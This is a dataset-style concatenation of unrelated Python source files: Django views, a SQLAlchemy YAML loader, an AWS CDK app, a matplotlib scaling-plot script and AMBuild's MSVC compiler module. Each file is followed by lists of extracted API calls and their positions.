    User.objects.create_user(first_name=data.get('first_name'),
                             last_name=data.get('last_name'),
                             username=data.get('username'),
                             email=data.get('email'),
                             password=data.get('password'))
    new_user = authenticate(username=data.get('username'),
                              password=data.get('password'))
    if new_user:
        login_user(request, new_user)
        print("new user created: " + new_user.get_username() + " " + new_user.get_full_name())
        return HttpResponseRedirect('/')
    print('failed to authenticate user')
    return render(request, 'core/createacc.html', {'form': form})
# forgot password
def forgotpassword(request):
    """Render the forgot-password form.

    Fix: the original referenced ``form`` without ever defining it,
    raising NameError on every request; instantiate the imported
    ForgotPasswordForm instead.
    """
    form = ForgotPasswordForm()
    # TODO: handle POST submissions (validate and send a reset email).
    return render(request, 'core/forgotpassword.html', {'form': form})
def newpost(request):
    """Create a Post from the submitted form data.

    Fix: both ``HttpResponseRedirect(...)`` responses were constructed
    but never returned, so the view returned None and Django raised a
    ValueError on every request.
    """
    form = PostForm(request.POST)
    if form.is_valid():
        cur_user = request.user
        title = form.cleaned_data.get('title')
        price = form.cleaned_data.get('price')
        description = form.cleaned_data.get('description')
        poster = cur_user.id
        category = form.cleaned_data.get('category')
        # NOTE(review): 'subcategory' is cleaned but never stored on the
        # Post -- confirm whether the model should receive it.
        subcategory = form.cleaned_data.get('subcategory')
        Post.objects.create(title=title, price=price, description=description, poster=poster, category=category)
        return HttpResponseRedirect('/newpostsuccess')
    else:
        print('form not valid')
        return HttpResponseRedirect('/')
def newpostsuccess(request):
    """Render the post-creation confirmation page."""
    template_name = 'core/newpostsuccess.html'
    return render(request, template_name)
def get_categories():
    """Return a queryset of every Category (used by the index view)."""
    return Category.objects.all()
| [
"django.shortcuts.render",
"django.contrib.auth.authenticate",
"django.http.HttpResponseRedirect",
"core.models.Category.objects.all",
"core.models.Post.objects.create",
"django.http.HttpResponse",
"django.contrib.auth.login",
"django.contrib.auth.models.User.objects.create_user",
"core.forms.PostFo... | [((603, 613), 'core.forms.PostForm', 'PostForm', ([], {}), '()\n', (611, 613), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((1252, 1272), 'django.contrib.auth.logout', 'logout_user', (['request'], {}), '(request)\n', (1263, 1272), True, 'from django.contrib.auth import logout as logout_user\n'), ((1397, 1412), 'core.forms.CreateAccForm', 'CreateAccForm', ([], {}), '()\n', (1410, 1412), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((2521, 2580), 'django.shortcuts.render', 'render', (['request', '"""core/forgotpassword.html"""', "{'form': form}"], {}), "(request, 'core/forgotpassword.html', {'form': form})\n", (2527, 2580), False, 'from django.shortcuts import render\n'), ((2613, 2635), 'core.forms.PostForm', 'PostForm', (['request.POST'], {}), '(request.POST)\n', (2621, 2635), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((3196, 3239), 'django.shortcuts.render', 'render', (['request', '"""core/newpostsuccess.html"""'], {}), "(request, 'core/newpostsuccess.html')\n", (3202, 3239), False, 'from django.shortcuts import render\n'), ((3272, 3294), 'core.models.Category.objects.all', 'Category.objects.all', ([], {}), '()\n', (3292, 3294), False, 'from core.models import Category, Post\n'), ((892, 942), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (904, 942), False, 'from django.contrib.auth import authenticate\n'), ((1139, 1177), 'django.template.loader.get_template', 'loader.get_template', (['"""core/login.html"""'], {}), "('core/login.html')\n", (1158, 1177), False, 'from django.template import Context, loader\n'), ((1184, 1193), 'django.template.Context', 'Context', ([], {}), '()\n', (1191, 1193), False, 'from django.template import Context, loader\n'), ((1454, 1481), 'core.forms.CreateAccForm', 'CreateAccForm', (['request.POST'], {}), 
'(request.POST)\n', (1467, 1481), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((2330, 2384), 'django.shortcuts.render', 'render', (['request', '"""core/createacc.html"""', "{'form': form}"], {}), "(request, 'core/createacc.html', {'form': form})\n", (2336, 2384), False, 'from django.shortcuts import render\n'), ((2948, 3056), 'core.models.Post.objects.create', 'Post.objects.create', ([], {'title': 'title', 'price': 'price', 'description': 'description', 'poster': 'poster', 'category': 'category'}), '(title=title, price=price, description=description,\n poster=poster, category=category)\n', (2967, 3056), False, 'from core.models import Category, Post\n'), ((3056, 3095), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/newpostsuccess"""'], {}), "('/newpostsuccess')\n", (3076, 3095), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((3133, 3158), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (3153, 3158), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((969, 994), 'django.contrib.auth.login', 'login_user', (['request', 'user'], {}), '(request, user)\n', (979, 994), True, 'from django.contrib.auth import login as login_user\n'), ((1006, 1031), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (1026, 1031), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1052, 1091), 'django.http.HttpResponse', 'HttpResponse', (['"""Error: could not log in"""'], {}), "('Error: could not log in')\n", (1064, 1091), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1796, 1919), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'first_name': 'first_name', 'last_name': 'last_name', 'username': 'username', 'email': 'email', 'password': 'password'}), '(first_name=first_name, last_name=last_name,\n username=username, 
email=email, password=password)\n', (1820, 1919), False, 'from django.contrib.auth.models import User\n'), ((1930, 1980), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (1942, 1980), False, 'from django.contrib.auth import authenticate\n'), ((2257, 2311), 'django.shortcuts.render', 'render', (['request', '"""core/createacc.html"""', "{'form': form}"], {}), "(request, 'core/createacc.html', {'form': form})\n", (2263, 2311), False, 'from django.shortcuts import render\n'), ((2002, 2031), 'django.contrib.auth.login', 'login_user', (['request', 'new_user'], {}), '(request, new_user)\n', (2012, 2031), True, 'from django.contrib.auth import login as login_user\n'), ((2134, 2159), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (2154, 2159), False, 'from django.http import HttpResponse, HttpResponseRedirect\n')] |
import argparse
import logging
import sys
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import ProgrammingError, OperationalError
import models
from seat_info_proxy import __version__
import yaml
__author__ = "<NAME>"
__copyright__ = "Ci4Rail GmbH"
__license__ = "MIT"
_logger = logging.getLogger(__name__)
def parse_args(args):
    """Build the CLI parser and parse ``args``.

    Args:
        args (list[str]): raw argument vector (typically sys.argv[1:]).

    Returns:
        argparse.Namespace: parsed options (``loglevel``, ``filename``).
    """
    cli = argparse.ArgumentParser(description="Preload DB with seat reservation data")
    cli.add_argument(
        "--version",
        action="version",
        version="seat-info-proxy {ver}".format(ver=__version__),
    )
    cli.add_argument(
        "-v", "--verbose",
        dest="loglevel",
        help="set loglevel to INFO",
        action="store_const",
        const=logging.INFO,
    )
    cli.add_argument(
        "-vv", "--very-verbose",
        dest="loglevel",
        help="set loglevel to DEBUG",
        action="store_const",
        const=logging.DEBUG,
    )
    cli.add_argument(
        "-f", "--file",
        dest="filename",
        required=True,
        help="input yaml",
    )
    return cli.parse_args(args)
def setup_logging(loglevel):
    """Setup basic logging
    Args:
        loglevel (int): minimum loglevel for emitting messages
    """
    logging.basicConfig(
        stream=sys.stdout,
        level=loglevel,
        format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
def main(args):
    """Parse CLI args, rebuild the SeatReservation table and load it from YAML.

    Args:
        args (list[str]): command line parameters as list of strings.
    """
    args = parse_args(args)
    setup_logging(args.loglevel)
    _logger.debug("Starting preloading db...")
    # Default to a local sqlite file unless DATABASE_URI is set.
    database_uri = os.getenv("DATABASE_URI", "sqlite:///seatinfos.db")
    # Connect to db
    engine = create_engine(database_uri)
    # Create the session
    session = sessionmaker()
    session.configure(bind=engine)
    s = session()
    # Drop any existing table so the load starts from a clean slate.
    _logger.info("Cleanup table...")
    try:
        models.SeatReservation.__table__.drop(engine)
    except (ProgrammingError, OperationalError):
        # Backends disagree on the error class for a missing table
        # (sqlite raises OperationalError, others ProgrammingError).
        _logger.info("No table to clean up")
    # Create Table
    _logger.info("(Re-)creating table...")
    models.SeatReservation.__table__.create(engine)
    _logger.info("Loading json...")
    with open(args.filename, 'r') as stream:
        try:
            data = yaml.safe_load(stream)
        except yaml.YAMLError as exc:
            _logger.error(exc)
            # Fix: without this return, `data` stays unbound and the
            # loop below raises NameError, masking the YAML parse error.
            return
    try:
        _logger.info("Creating Records...")
        for i in data:
            record = models.SeatReservation(**{
                'trainid': i["trainid"],
                'seatid': i["seatid"],
                'startstation': i["startstation"],
                'endstation': i["endstation"]
            })
            print(record)
            s.add(record)  # Add all the records
        _logger.info("Attempt to commit all the records...")
        s.commit()
    except Exception as e:
        # Roll back the whole batch so the table is never half-loaded.
        _logger.error("Errors while adding seatreservation data. Rollback.")
        _logger.error('Exception: ' + str(e))
        s.rollback()
    finally:
        s.close()  # Close the connection
    _logger.info("Done!")
def run():
    """Console-script entry point: run main() on the real argv."""
    main(sys.argv[1:])
if __name__ == "__main__":
run()
| [
"logging.getLogger",
"logging.basicConfig",
"sqlalchemy.orm.sessionmaker",
"models.SeatReservation.__table__.create",
"models.SeatReservation",
"argparse.ArgumentParser",
"os.getenv",
"sqlalchemy.create_engine",
"yaml.safe_load",
"models.SeatReservation.__table__.drop"
] | [((346, 373), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (363, 373), False, 'import logging\n'), ((411, 487), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Preload DB with seat reservation data"""'}), "(description='Preload DB with seat reservation data')\n", (434, 487), False, 'import argparse\n'), ((1394, 1499), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'loglevel', 'stream': 'sys.stdout', 'format': 'logformat', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=loglevel, stream=sys.stdout, format=logformat,\n datefmt='%Y-%m-%d %H:%M:%S')\n", (1413, 1499), False, 'import logging\n'), ((1657, 1708), 'os.getenv', 'os.getenv', (['"""DATABASE_URI"""', '"""sqlite:///seatinfos.db"""'], {}), "('DATABASE_URI', 'sqlite:///seatinfos.db')\n", (1666, 1708), False, 'import os\n'), ((1743, 1770), 'sqlalchemy.create_engine', 'create_engine', (['database_uri'], {}), '(database_uri)\n', (1756, 1770), False, 'from sqlalchemy import create_engine\n'), ((1811, 1825), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {}), '()\n', (1823, 1825), False, 'from sqlalchemy.orm import sessionmaker\n'), ((2215, 2262), 'models.SeatReservation.__table__.create', 'models.SeatReservation.__table__.create', (['engine'], {}), '(engine)\n', (2254, 2262), False, 'import models\n'), ((1953, 1998), 'models.SeatReservation.__table__.drop', 'models.SeatReservation.__table__.drop', (['engine'], {}), '(engine)\n', (1990, 1998), False, 'import models\n'), ((2377, 2399), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (2391, 2399), False, 'import yaml\n'), ((2567, 2711), 'models.SeatReservation', 'models.SeatReservation', ([], {}), "(**{'trainid': i['trainid'], 'seatid': i['seatid'],\n 'startstation': i['startstation'], 'endstation': i['endstation']})\n", (2589, 2711), False, 'import models\n')] |
#!/usr/bin/env python3
import os
import jsii
import aws_cdk as cdk
from aws_cdk import (
Aspects,
CfnResource
)
@jsii.implements(cdk.IAspect)
class ForceDeletion:
    """CDK aspect forcing every CfnResource to the DESTROY removal policy."""

    def visit(self, scope):
        """Visit one construct; only raw CfnResources get the policy."""
        if not isinstance(scope, CfnResource):
            return
        scope.apply_removal_policy(cdk.RemovalPolicy.DESTROY)
from step_functions_example.step_functions_example_stack import StepFunctionsExampleStack

app = cdk.App()

# No 'env' is passed, so the stack is environment-agnostic: the single
# synthesized template can be deployed to any account/region, but
# account/region-dependent features and context lookups will not work.
# To pin the stack, pass e.g.
#   env=cdk.Environment(account=os.getenv('CDK_DEFAULT_ACCOUNT'),
#                       region=os.getenv('CDK_DEFAULT_REGION'))
# or hard-code the account/region.  See
# https://docs.aws.amazon.com/cdk/latest/guide/environments.html
my_stack = StepFunctionsExampleStack(app, "SFN2")

# Make every resource in the stack deletable on stack teardown.
Aspects.of(my_stack).add(ForceDeletion())

app.synth()
| [
"aws_cdk.Aspects.of",
"aws_cdk.App",
"jsii.implements",
"step_functions_example.step_functions_example_stack.StepFunctionsExampleStack"
] | [((124, 152), 'jsii.implements', 'jsii.implements', (['cdk.IAspect'], {}), '(cdk.IAspect)\n', (139, 152), False, 'import jsii\n'), ((410, 419), 'aws_cdk.App', 'cdk.App', ([], {}), '()\n', (417, 419), True, 'import aws_cdk as cdk\n'), ((431, 469), 'step_functions_example.step_functions_example_stack.StepFunctionsExampleStack', 'StepFunctionsExampleStack', (['app', '"""SFN2"""'], {}), "(app, 'SFN2')\n", (456, 469), False, 'from step_functions_example.step_functions_example_stack import StepFunctionsExampleStack\n'), ((1229, 1249), 'aws_cdk.Aspects.of', 'Aspects.of', (['my_stack'], {}), '(my_stack)\n', (1239, 1249), False, 'from aws_cdk import Aspects, CfnResource\n')] |
#!/usr/bin/env python
# Copyright 2015-2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import matplotlib.pyplot as plt
import argparse
import json
from pr_json_common import *
from json_dict_common import *
from math import nan
# Maps a scaling name to a function giving the ideal factor between two
# consecutive core counts (x -> y) when extending an ideal line.
# The trailing letter appears to mark direction: 'd' for a decreasing
# quantity (value shrinks as cores grow) and 'i' for an increasing one
# -- see isDecreasing below.
scalings = { 'constant' : (lambda x, y : 1.),
             'lineard' : (lambda x, y : float(x) / y),
             'lineari' : (lambda x, y : float(y) / x),
             'quadraticd' : (lambda x, y : float(x**2) / y**2),
             'quadratici' : (lambda x, y : float(y**2) / x**2)
           }
def isDecreasing(name):
    """Return True when the scaling name denotes a decreasing quantity.

    Decreasing scalings carry a 'd' suffix (e.g. 'lineard',
    'quadraticd'); increasing ones an 'i' suffix.

    Args:
        name (str): Name of the scaling, e.g. a key of ``scalings``.

    Returns:
        bool: True if the name ends with 'd'.
    """
    assert isinstance(name, str)
    # endswith handles the empty string gracefully; the previous
    # name[-1] indexing raised IndexError on ''.
    return name.endswith('d')
#### End of function isDecreasing
def read_summary_data_from_files(fileList, threads=False):
    """
    Reads the I/O, MPI and CPU percentage fields from a list of profile
    files. The files are assumed to describe the same application run at
    different process (or thread) counts.
    Args:
        fileList (list): List of filenames to read data from
        threads (bool): Read the thread count instead of the process
            count from each summary file
    Returns:
        Two dictionaries keyed by processor count: the first maps to the
        [io, mpi, cpu] percentages, the second to the corresponding
        wallclock times
    """
    assert isinstance(fileList, list)
    barDict = {}
    timeDict = {}
    for filename in fileList:
        filename = filename.strip()
        try:
            with open(filename, "r") as infile:
                jsonDict = json.load(infile)
            runtime = get_runtime(jsonDict)
            numprocs = get_num_threads(jsonDict) if threads else get_num_processes(jsonDict)
            # Pull the overview percentages for each activity class.
            overview = get_overview_data(jsonDict)
            percentages = [get_dict_field_val(overview, [field, "percent"])
                           for field in ["io", "mpi", "cpu"]]
            barDict[numprocs] = percentages
            # Convert each percentage into absolute wallclock seconds.
            timeDict[numprocs] = [(p / 100.) * runtime for p in percentages]
        except IOError:
            print("File " + filename + " does not exist. Skipping.")
    return barDict, timeDict
#### End of function read_summary_data_from_files
def get_ideal_func(expected):
    """Look up the ideal-scaling factor function for *expected*.

    Raises KeyError when *expected* is not a key of ``scalings``.
    """
    return scalings[expected]
def get_ideal_line(initTime, coreCounts, expected):
    """
    Gets data for an ideal scaling line in either the weak or strong case.
    Args:
        initTime (float): The initial time from which to draw an ideal scaling
        coreCounts (list): List of counts of cores from which the ideal line
            can be calculated
        expected (str): Indicates what sort of scaling is expected for the
            ideal line (a key of ``scalings``)
    Returns:
        list: One ideal value per entry of coreCounts (empty when
        coreCounts is empty)
    """
    # Guard: an empty core-count list previously crashed with IndexError
    # on idealData[0].
    if not coreCounts:
        return []
    scalingFunc = get_ideal_func(expected)
    idealData = [initTime]
    # Each point is the previous one scaled by the ideal factor between
    # consecutive core counts.
    for prev, curr in zip(coreCounts, coreCounts[1:]):
        idealData.append(idealData[-1] * scalingFunc(prev, curr))
    return idealData
#### End of function get_ideal_line
def plot_bar_data(barData, threads=False):
    """
    Draws a grouped bar chart of the I/O, MPI and CPU percentages on the
    upper subplot of the current figure.
    The dictionary must map a processor count to a three-element list:
        { numprocs : [io, mpi, cpu] }
    Args:
        barData (dict): A dictionary assumed to have a very specific format
        threads (bool): Label the x-axis with threads rather than processes
    Returns:
        Nothing
    """
    assert isinstance(barData, dict)
    keys = sorted(barData.keys())
    positions = range(len(keys))
    barWidth = 0.3
    # Upper half of the figure; the wallclock-time plot goes below it.
    axes = plt.subplot(211)
    # One bar group per field: (x-offset, colour, legend label, data index).
    for offset, colour, label, idx in ((-barWidth, 'r', 'io', 0),
                                       (0.0, 'b', 'mpi', 1),
                                       (barWidth, 'g', 'cpu', 2)):
        heights = [barData[key][idx] for key in keys]
        axes.bar([pos + offset for pos in positions], heights, width=barWidth,
                 color=colour, align='center', label=label)
    axes.set_xticks(positions)
    axes.set_xticklabels(keys)
    if threads:
        axes.set_xlabel("Number of Threads")
    else:
        axes.set_xlabel("Number of Processes")
    axes.set_ylabel("Proportion of Time (%)")
    axes.legend(loc=1, bbox_to_anchor=(1.1, 1.1))
#### End of function plot_bar_data
def noneIfZero(myList, func):
    """Apply *func* to *myList*, unless every element is zero (or the
    list is empty), in which case return None."""
    for item in myList:
        if item != 0:
            return func(myList)
    return None
#### End of function noneIfZero
def plot_time_data(timeData, threads=False, expected=None):
    """
    Plots the data given in the dictionary of time data. The keys in here are
    the number of processes that are used, and the values are the wallclock
    time for the I/O, MPI and CPU portions of a run. It is assumed that the
    runs represent the strong scaling of a program to more processes.
    Specifically, the data is of the form
        { numprocs : [io, mpi, cpu] }
    where all the variables listed are numeric
    Args:
        timeData (dict): A dictionary assumed to have a very specific format
        threads (bool): Label the x-axis with threads rather than processes
        expected (list): Optional list of expected-scaling names (keys of
            ``scalings``) for which ideal lines are drawn
    Returns:
        Nothing
    """
    assert isinstance(timeData, dict)
    # Get the list of keys and sort them
    sortedKeys = sorted(timeData.keys())
    x = range(len(sortedKeys))
    # Get the appropriate data
    ioData = [timeData[key][0] for key in sortedKeys]
    mpiData = [timeData[key][1] for key in sortedKeys]
    cpuData = [timeData[key][2] for key in sortedKeys]
    # Lower half of the figure; the bar chart sits above it.
    ax = plt.subplot(212)
    handles = []
    if expected:
        # NOTE(review): only two line styles are defined, so at most two
        # ideal lines can be drawn -- a third entry raises IndexError.
        expectedStyles = ['k-', 'k--']
        for cnt, scaling in enumerate(expected):
            # Strip the trailing i/d marker from the legend label. The
            # previous test was ``scaling == 'd'``, which never matched a
            # real key, so decreasing scalings kept their suffix.
            label = scaling[0:-1] if scaling[-1] in ('i', 'd') else scaling
            # Plot an ideal line, anchored above the largest (decreasing)
            # or smallest (increasing) non-zero series.
            idealFunc = max if isDecreasing(scaling) else min
            idealInit = idealFunc([data for data in [noneIfZero(ioData, idealFunc),
                noneIfZero(mpiData, idealFunc), noneIfZero(cpuData, idealFunc)] if data]) * 2
            idealHandle, = ax.semilogy(x, get_ideal_line(idealInit, sortedKeys, scaling),
                    expectedStyles[cnt], label=label)
            handles.append(idealHandle)
    # We want a log plot of the results; skip all-zero series entirely.
    if (any(ioData)):
        ioHandle, = ax.semilogy(x, ioData, 'r-', label="io", linewidth=2)
        handles.append(ioHandle)
    if (any(mpiData)):
        mpiHandle, = ax.semilogy(x, mpiData, 'b-', label="mpi", linewidth=2)
        handles.append(mpiHandle)
    if (any(cpuData)):
        cpuHandle, = ax.semilogy(x, cpuData, 'g-', label="cpu", linewidth=2)
        handles.append(cpuHandle)
    # Set the legend, axes label and ticks
    ax.legend(handles=handles, loc=1, bbox_to_anchor=(0.25, 1.1))
    ax.set_xticks(x)
    ax.set_xticklabels(sortedKeys)
    if (threads):
        ax.set_xlabel("Number of Threads")
    else:
        ax.set_xlabel("Number of Processes")
    ax.set_ylabel("Wallclock time (s)")
#### End of function plot_time_data
if __name__ == "__main__":
    # Build the command-line interface for the plotting utility.
    parser = argparse.ArgumentParser(description="Utility to plot a set of line " +
            "charts for the MPI, I/O and CPU activity recorded in a set of " +
            "Performance Report profiles. It is assumed that the set of profiles " +
            "passed in is generated for strong / weak scaling runs for a " +
            "particular program")
    # Add a file containing a list of files to read data from
    parser.add_argument("infile", help="Text file to read a list of input files from",
            type=argparse.FileType('r'))
    # Add an argument to show if the strong scaling is for threads or processes
    parser.add_argument("--threads", help="Indicates whether threads or processes" +
            " should used in the scaling analysis", action="store_true",
            default=False)
    # nargs="+" allows more than one expected scaling (one ideal line each).
    parser.add_argument("--expected", help="Indicates which scaling is expected" +
            " for the model. This should be one of ['constant', 'linear[i/d]'," +
            " 'quadratic[i/d]']. The i or d suffix indicates increasing or " +
            "decreasing scale", choices=sorted(scalings.keys()), nargs="+",
            default=None)
    args = parser.parse_args()
    # Read the list of files
    fileList = args.infile.readlines()
    # Get the summary data from the files
    barData, timeData = read_summary_data_from_files(fileList, args.threads)
    # Plot the summary data in a bar chart
    plot_bar_data(barData, args.threads)
    plot_time_data(timeData, args.threads, args.expected)
    # Both subplots share one figure; show it interactively.
    plt.show()
| [
"argparse.FileType",
"argparse.ArgumentParser",
"json.load",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] | [((4410, 4426), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (4421, 4426), True, 'import matplotlib.pyplot as plt\n'), ((6153, 6169), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (6164, 6169), True, 'import matplotlib.pyplot as plt\n'), ((7955, 8268), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': "('Utility to plot a set of line ' +\n 'charts for the MPI, I/O and CPU activity recorded in a set of ' +\n 'Performance Report profiles. It is assumed that the set of profiles ' +\n 'passed in is generated for strong / weak scaling runs for a ' +\n 'particular program')"}), "(description='Utility to plot a set of line ' +\n 'charts for the MPI, I/O and CPU activity recorded in a set of ' +\n 'Performance Report profiles. It is assumed that the set of profiles ' +\n 'passed in is generated for strong / weak scaling runs for a ' +\n 'particular program')\n", (7978, 8268), False, 'import argparse\n'), ((9481, 9491), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9489, 9491), True, 'import matplotlib.pyplot as plt\n'), ((8464, 8486), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (8481, 8486), False, 'import argparse\n'), ((2088, 2105), 'json.load', 'json.load', (['infile'], {}), '(infile)\n', (2097, 2105), False, 'import json\n')] |
# vim: set ts=8 sts=4 sw=4 tw=99 et:
#
# This file is part of AMBuild.
#
# AMBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# AMBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AMBuild. If not, see <http://www.gnu.org/licenses/>.
import os
import re
from ambuild2 import util
from ambuild2.frontend.v2_2.cpp.deptypes import PchNodes
from ambuild2.frontend.v2_2.cpp.vendor import Archiver, Linker, Vendor
# Microsoft Visual C++
class MSVC(Vendor):
    """Vendor definition for the Microsoft Visual C++ compiler (cl.exe).

    Encodes cl.exe/link.exe command-line conventions: every returned argv
    token is significant, including flag spellings and ordering.
    """
    def __init__(self, version):
        super(MSVC, self).__init__(version)
    @property
    def name(self):
        """Canonical vendor name."""
        return 'msvc'
    @property
    def behavior(self):
        """Command-line behavior family used by the build driver."""
        return 'msvc'
    @property
    def family(self):
        """Compiler family identifier."""
        return 'msvc'
    def like(self, name):
        """Return True when this vendor matches *name*."""
        return name == 'msvc'
    @property
    def definePrefix(self):
        """Flag prefix for preprocessor defines (/DNAME)."""
        return '/D'
    @property
    def objSuffix(self):
        """File extension for compiled object files."""
        return '.obj'
    @property
    def debugInfoArgv(self):
        """Flags emitting debug info into the object file (/Z7)."""
        return ['/Z7']
    def makePchArgv(self, source_file, pch_file, source_type):
        """Argv to create a precompiled header from *source_file*."""
        return ['/showIncludes', '/nologo', '/Yc', '/c', source_file, '/Fp' + pch_file]
    def parseDebugInfoType(self, debuginfo):
        """Map the generic 'bundled' debug mode to MSVC's 'separate' PDBs."""
        if debuginfo == 'bundled':
            return 'separate'
        return debuginfo
    def objectArgs(self, sourceFile, objFile):
        """Argv to compile *sourceFile* into *objFile*."""
        return ['/showIncludes', '/nologo', '/c', sourceFile, '/Fo' + objFile]
    def programLinkArgv(self, cmd_argv, files, linkFlags, symbolFile, outputFile):
        """Argv to link an executable; adds /DEBUG + PDB when symbols are on."""
        argv = cmd_argv + files
        argv += ['/link']
        argv += linkFlags
        argv += [
            '/OUT:' + outputFile,
            '/nologo',
        ]
        if symbolFile:
            argv += ['/DEBUG', '/PDB:"' + symbolFile + '.pdb"']
        return argv
    def libLinkArgv(self, cmd_argv, files, linkFlags, symbolFile, outputFile):
        """Argv to link a DLL; same as programLinkArgv plus /DLL."""
        argv = cmd_argv + files
        argv += ['/link']
        argv += linkFlags
        argv += [
            '/OUT:' + outputFile,
            '/nologo',
            '/DLL',
        ]
        if symbolFile:
            argv += ['/DEBUG', '/PDB:"' + symbolFile + '.pdb"']
        return argv
    def preprocessArgv(self, sourceFile, outFile):
        """Argv to run the preprocessor only (/P) into *outFile*."""
        return ['/showIncludes', '/nologo', '/P', '/c', sourceFile, '/Fi' + outFile]
    @staticmethod
    def IncludePath(output_path, include_path):
        """Normalise *include_path* relative to *output_path* for cl.exe."""
        assert os.path.isabs(output_path)
        output_path = os.path.normcase(output_path)
        if not os.path.isabs(include_path):
            abs_include_path = os.path.join(output_path, include_path)
        else:
            abs_include_path = include_path
        abs_include_path = os.path.normcase(abs_include_path)
        # Hack - try and get a relative path because CL, with either
        # /Zi or /ZI, combined with subprocess, apparently tries and
        # looks for paths like c:\bleh\"c:\bleh" <-- wtf
        # .. this according to Process Monitor
        output_drive, _ = os.path.splitdrive(output_path)
        include_drive, _ = os.path.splitdrive(abs_include_path)
        # Cross-drive paths have no relative form on Windows.
        if output_drive != include_drive:
            return os.path.normcase(include_path)
        return os.path.relpath(abs_include_path, output_path)
    def formatInclude(self, build_root, output_path, include):
        """Format a single include directory as a /I flag pair."""
        return ['/I', MSVC.IncludePath(output_path, include)]
    def formatPchInclude(self, build_root, output_path, pch):
        """Flags to consume a precompiled header (/Fp, /Yu, /I)."""
        folder, header_name = os.path.split(pch.header_file.path)
        # Include path calculation expects a path relative to output_path, so
        # we need to transform it.
        pch_rel_folder = os.path.relpath(os.path.join(build_root, pch.pch_file.path), output_path)
        argv = [
            '/Fp' + MSVC.IncludePath(output_path, pch_rel_folder),
            '/Yu' + header_name,
            '/I',
            MSVC.IncludePath(output_path, folder),
        ]
        return argv
    ##
    # MSVC-specific properties.
    ##
    @property
    def shared_pdb_name(self):
        """Derive the shared vcXX.pdb name from the cl.exe version."""
        cl_version = int(self.version_string)
        # Truncate down to the major version then correct the offset
        # There is some evidence that the first digit of the minor version can be used for the PDB, but I can't reproduce it
        cl_version = int(cl_version / 100) - 6
        # Microsoft introduced a discontinuity with vs2015
        if cl_version >= 13:
            cl_version += 1
        # Pad it back out again
        cl_version *= 10
        return 'vc{0}.pdb'.format(cl_version)
    # cl.exe /showIncludes does not show anything at all for precompiled headers,
    # so the only way we can build a proper dependency is by rebuilding every
    # source file that *might* use the PCH, whether or not it actually does.
    @property
    def pch_needs_strong_deps(self):
        return True
    # cl.exe precompiles source files, technically, not headers. So we need to
    # link against something.
    @property
    def pch_needs_source_file(self):
        return True
    @property
    def shared_pdb_flags(self):
        """Compile flags that imply a shared PDB file."""
        return set(['/Zi', '/ZI'])
    def nameForPch(self, source_file):
        """Output filename for the PCH built from *source_file*."""
        return os.path.splitext(source_file)[0] + '.pch'
    @property
    def emits_dependency_file(self):
        """MSVC reports includes via /showIncludes, not a depfile."""
        return False
class MsvcLinker(Linker):
    """Linker (link.exe) driver stub for the MSVC toolchain."""
    def __init__(self):
        super(MsvcLinker, self).__init__()
    def like(self, name):
        # This vendor only matches itself.
        return name == 'msvc'
class MsvcArchiver(Archiver):
    """Static-library archiver (lib.exe) driver for the MSVC toolchain."""

    def __init__(self):
        super(MsvcArchiver, self).__init__()

    def like(self, name):
        # This vendor only matches itself.
        return name == 'msvc'

    def makeArgv(self, base_argv, files, outputFile):
        """Build the archiver command line: base args, /OUT:, then inputs."""
        argv = list(base_argv)
        argv.append('/OUT:' + outputFile)
        argv.extend(files)
        return argv
| [
"os.path.isabs",
"os.path.splitdrive",
"os.path.join",
"os.path.splitext",
"os.path.split",
"os.path.normcase",
"os.path.relpath"
